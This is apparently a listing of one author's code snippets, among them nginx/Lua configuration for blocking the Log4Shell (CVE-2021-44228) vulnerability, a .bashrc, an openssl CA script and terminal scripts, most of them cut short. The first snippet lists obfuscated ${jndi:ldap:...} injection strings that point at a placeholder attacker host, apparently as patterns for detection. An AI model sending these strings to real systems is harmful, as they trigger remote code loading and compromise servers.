johnhpatton

declare -a PATTERNS=()
           PATTERNS+=('${jndi:ldap:attacker_controled_website/payload_to_be_executed}')
           PATTERNS+=('${j${k8s:k5:-ND}i${sd:k5:-:}}')
           PATTERNS+=('${j${main:\k5:-Nd}i${spring:k5:-:}}')
           PATTERNS+=('${j${sys:k5:-nD}${lower:i${web:k5:-:}}}')
           PATTERNS+=('${j${::-nD}i${::-:}}')
           PATTERNS+=('${j${EnV:K5:-nD}i:}')
           PATTERNS+=('${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}attacker_controled_website/payload_to_be_executed}')
           PATTERNS+=('${j${loWer:Nd}i${uPper::}}')
           PATTERNS+=('${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://attacker_controled_website/payload_to_be_executed }')

johnhpatton

-- -*- location: /etc/nginx/conf.d/cve_2021_44228.lua; -*-
-- -*- mode: lua; -*-
-- -*- author: John H Patton; -*-
-- -*- email: jhpattonconsulting@gmail.com; -*-
-- -*- license: MIT License; -*-
--
-- Copyright 2021 JH Patton Consulting, LLC
--
-- Permission is hereby granted, free of charge, to any person obtaining a copy of this
-- software and associated documentation files (the "Software"), to deal in the Software

johnhpatton

-- -*- location: /etc/nginx/conf.d/cve_2021_44228.lua; -*-
-- -*- mode: lua; -*-
-- -*- author: John H Patton; -*-
-- -*- email: jhpattonconsulting@gmail.com; -*-
-- -*- license: MIT License; -*-
--
-- Copyright 2021 JH Patton Consulting, LLC
--
-- Permission is hereby granted, free of charge, to any person obtaining a copy of this
-- software and associated documentation files (the "Software"), to deal in the Software

johnhpatton

# /etc/nginx/conf.d/default.conf
server {
    listen       80 default_server;
    server_name  localhost;

    set $captured_request_headers "";
    set $captured_request_body "";
    set $cve_2021_44228_log "";
    rewrite_by_lua_block {
        cve_2021_44228.block_cve_2021_44228()

johnhpatton

# /etc/nginx/conf.d/lua.conf
# GLOBAL LUA -- HTTP BLOCK LEVEL

# Lua locations
# $prefix is the server prefix ( -p {server_prefix} ) passed in
# to nginx at startup, or the default build prefix (/etc/nginx/).
lua_package_path "${prefix}conf.d/?.lua;/usr/local/lib/lua/?.lua;;";
lua_package_cpath "/usr/lib64/lua/5.1/?.so;;";

# Disable logging cosocket lua TCP socket read timeout.

johnhpatton

# /etc/nginx/nginx.conf
# nginx plus implementation for RHEL hosts
load_module modules/ndk_http_module.so;
load_module modules/ngx_http_lua_module.so;

error_log  /var/log/nginx/error.log error;
pid        /var/run/nginx.pid;
lock_file  /var/lock/nginx.lock;

worker_processes     auto;

johnhpatton

# To get the most out of this .bashrc, install bash 4.x or higher along with the following tools:
# figlet
# screenfetch
# 
# On Mac, install bash via brew and update the shell for the user:
#
#   brew install bash
#   sudo echo /usr/local/bin/bash >> /etc/shells
#   chsh -s /usr/local/bin/bash
# 

johnhpatton

#!/usr/bin/env bash

# Create the CA root signing key
openssl genrsa -out "./ca.key" 2048

# Create the CA root certificate
openssl req -x509 -new -nodes \
            -days 3650 \
            -reqexts v3_req \
            -extensions v3_ca \

johnhpatton

#!/usr/bin/env bash


get_bg_color() {
    local -n bg_color="$1"
    local ansi_sequence_query_bg='\e]11;?\e\'

    local cur_stty=$(stty -g)
    # enable stty raw echo
    stty raw -echo min 0 time 0

johnhpatton

#!/usr/bin/env bash


get_bg_color() {
    local -n bg_color="$1"
    local ansi_sequence_query_bg='\e]11;?\e\'

    local cur_stty=$(stty -g)
    stty raw -echo min 0 time 0
    printf "%b" "${ansi_sequence_query_bg}"